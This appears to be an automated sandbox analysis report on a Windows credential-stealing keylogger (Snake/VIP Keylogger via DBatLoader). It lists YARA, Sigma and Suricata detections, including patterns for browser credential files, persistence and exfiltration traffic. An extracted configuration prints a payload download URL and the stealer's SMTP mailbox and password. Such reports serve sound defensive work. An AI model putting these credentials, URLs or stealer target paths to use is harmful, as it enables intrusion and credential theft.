3.2.nhpoymuP.pif.31c30000.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.31c30000.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.31c30000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.31c30000.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
7.2.nhpoymuP.pif.27840000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.nhpoymuP.pif.27840000.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.nhpoymuP.pif.323b0000.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
3.2.nhpoymuP.pif.30655570.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.30655570.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.nhpoymuP.pif.30655570.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.30655570.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.30655570.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.31c30000.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
7.2.nhpoymuP.pif.27840000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.nhpoymuP.pif.27840000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.nhpoymuP.pif.27840000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.30656458.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.nhpoymuP.pif.30656458.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.nhpoymuP.pif.30656458.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.nhpoymuP.pif.30656458.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.nhpoymuP.pif.30656458.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.323b0000.8.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
14.3.nhpoymuP.pif.240bcc58.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.3.nhpoymuP.pif.240bcc58.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
14.3.nhpoymuP.pif.240bcc58.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.3.nhpoymuP.pif.240bcc58.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.3.nhpoymuP.pif.240bcc58.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.nhpoymuP.pif.31c30000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
3.2.nhpoymuP.pif.30656458.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x967ba:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x9678e:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x96852:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x9676a:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x967d0:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x9659d:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x91bea:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x91bb9:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword 0x96671:$a13: _encryptedPassword
3.2.nhpoymuP.pif.323b0000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.nhpoymuP.pif.30656458.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xa18be:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0xa0f61:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0xa11be:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data 0xa1b9d:$a5: \Kometa\User Data\Default\Login Data
7.2.nhpoymuP.pif.275099de.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.nhpoymuP.pif.27840000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
3.2.nhpoymuP.pif.30656458.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x94362:$s1: UnHook 0x3c3c6:$s2: SetHook 0x942fe:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x94337:$s3: CallNextHook 0x3c38e:$s4: _hook 0x942c6:$s4: _hook
7.2.nhpoymuP.pif.275099de.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
3.2.nhpoymuP.pif.30655570.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x976a2:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x97676:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x9773a:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x97652:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x976b8:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x97485:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x92ad2:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x92aa1:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword 0x97559:$a13: _encryptedPassword
14.3.nhpoymuP.pif.240bcc58.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
7.2.nhpoymuP.pif.27840000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
3.2.nhpoymuP.pif.30655570.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xa27a6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0xa1e49:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0xa20a6:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data 0xa2a85:$a5: \Kometa\User Data\Default\Login Data
14.3.nhpoymuP.pif.240bcc58.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
7.2.nhpoymuP.pif.27840000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
3.2.nhpoymuP.pif.30655570.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x9524a:$s1: UnHook 0x3d2ae:$s2: SetHook 0x951e6:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x9521f:$s3: CallNextHook 0x3d276:$s4: _hook 0x951ae:$s4: _hook
14.3.nhpoymuP.pif.240bcc58.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
Click to see the 328 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\image.exe, ProcessId: 7276, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\nhpoymuP.pif, CommandLine: C:\Users\Public\Libraries\nhpoymuP.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\nhpoymuP.pif, NewProcessName: C:\Users\Public\Libraries\nhpoymuP.pif, OriginalFileName: C:\Users\Public\Libraries\nhpoymuP.pif, ParentCommandLine: "C:\Users\user\Desktop\image.exe", ParentImage: C:\Users\user\Desktop\image.exe, ParentProcessId: 7276, ParentProcessName: image.exe, ProcessCommandLine: C:\Users\Public\Libraries\nhpoymuP.pif, ProcessId: 7416, ProcessName: nhpoymuP.pif

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\image.exe, ProcessId: 7276, TargetFilename: C:\Windows \SysWOW64\svchost.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Pumyophn.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\image.exe, ProcessId: 7276, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Pumyophn

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Pumyophn.PIF" , ParentImage: C:\Users\Public\Libraries\Pumyophn.PIF, ParentProcessId: 7584, ParentProcessName: Pumyophn.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 7644, ProcessName: cmd.exe

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 193.122.130.0, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\nhpoymuP.pif, Initiated: true, ProcessId: 7416, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Pumyophn.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\image.exe, ProcessId: 7276, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Pumyophn

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\nhpoymuP.pif, CommandLine: C:\Users\Public\Libraries\nhpoymuP.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\nhpoymuP.pif, NewProcessName: C:\Users\Public\Libraries\nhpoymuP.pif, OriginalFileName: C:\Users\Public\Libraries\nhpoymuP.pif, ParentCommandLine: "C:\Users\user\Desktop\image.exe", ParentImage: C:\Users\user\Desktop\image.exe, ParentProcessId: 7276, ParentProcessName: image.exe, ProcessCommandLine: C:\Users\Public\Libraries\nhpoymuP.pif, ProcessId: 7416, ProcessName: nhpoymuP.pif

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.198.176, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\nhpoymuP.pif, Initiated: true, ProcessId: 7688, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49773

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T16:04:58.793329+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	23.237.26.135	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T16:05:31.634624+0100	2803305	3	Unknown Traffic	192.168.2.4	49742	188.114.97.3	443	TCP
2025-01-02T16:05:37.149920+0100	2803305	3	Unknown Traffic	192.168.2.4	49747	188.114.97.3	443	TCP
2025-01-02T16:05:37.602602+0100	2803305	3	Unknown Traffic	192.168.2.4	49748	188.114.97.3	443	TCP
2025-01-02T16:05:39.157162+0100	2803305	3	Unknown Traffic	192.168.2.4	49751	188.114.97.3	443	TCP
2025-01-02T16:05:46.962711+0100	2803305	3	Unknown Traffic	192.168.2.4	49767	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T16:05:28.208759+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	193.122.130.0	80	TCP
2025-01-02T16:05:31.036881+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	193.122.130.0	80	TCP
2025-01-02T16:05:31.911893+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-02T16:05:33.193132+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49743	193.122.130.0	80	TCP
2025-01-02T16:05:36.043613+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-02T16:05:36.990025+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49740	193.122.130.0	80	TCP
2025-01-02T16:05:38.990029+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49750	193.122.130.0	80	TCP
2025-01-02T16:05:41.036998+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49755	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T16:05:46.371969+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49765	149.154.167.220	443	TCP
2025-01-02T16:05:52.527368+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49772	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: image.exe	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://fodoknotel.za.com/233_Pumyophnrer"]}
Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}
Source: 3.3.nhpoymuP.pif.2d7ca218.0.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@techniqueqatar.com", "Password": "TechFB2023$$$", "Host": "mail.techniqueqatar.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Pumyophn.PIF

ReversingLabs: Detection: 15%

Multi AV Scanner detection for submitted file

Source: image.exe

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Pumyophn.PIF

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: image.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\nhpoymuP.pif	Unpacked PE file: 3.2.nhpoymuP.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Unpacked PE file: 7.2.nhpoymuP.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Unpacked PE file: 14.2.nhpoymuP.pif.400000.0.unpack

Source: image.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 23.237.26.135:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702655270.000000007E8B0000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020B5B000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.000000002192E000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1703150557.00000000218D1000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825967766.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: nhpoymuP.pif, 00000003.00000003.1932254507.000000002D812000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020AD0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020B5D000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: nhpoymuP.pif, 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000003.00000002.1988448471.0000000031C30000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1832441776.0000000025817000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 00000007.00000003.1840188323.000000002586F000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, nhpoymuP.pif, 0000000E.00000003.1919537764.00000000240BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: image.exe, 00000000.00000002.1741511764.0000000020B27000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702911770.00000000218D2000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000003.1702911770.0000000021901000.00000004.00000020.00020000.00000000.sdmp, image.exe, 00000000.00000002.1746460570.000000007EB80000.00000004.00001000.00020000.00000000.sdmp, image.exe, 00000000.00000002.1741511764.0000000020AD0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020B5D000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000002.1861657650.0000000020AE0000.00000004.00001000.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825586433.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000004.00000003.1825586433.0000000000906000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000009.00000003.1905153099.0000000000748000.00000004.00000020.00020000.00000000.sdmp, Pumyophn.PIF, 00000009.00000003.1905153099.0000000000719000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\image.exe

Code function: 0_2_02C958B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02C958B4

Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	3_2_2F55DC80
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	3_2_3250BED0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	3_2_3250BEC8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh	3_2_3250BFD4
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh	3_2_3250BFE0
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	7_2_2740DC80
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 27A8F2B5h	7_2_27A8F0C8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 27A8FC3Fh	7_2_27A8F0C8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_27A8E5E8
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 27A8E0C5h	7_2_27A8E114
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 27A8E0C5h	7_2_27A8DF07
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_27A8EDFB
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_27A8EC1B
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 2B6F10E9h	7_2_2B6F0E38
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 2B6F185Dh	7_2_2B6F1440
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 2B6FCDE1h	7_2_2B6FCB38
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 2B6FFDA9h	7_2_2B6FFB00
Source: C:\Users\Public\Libraries\nhpoymuP.pif	Code function: 4x nop then jmp 2B6FD691h	7_2_2B6FD3E8
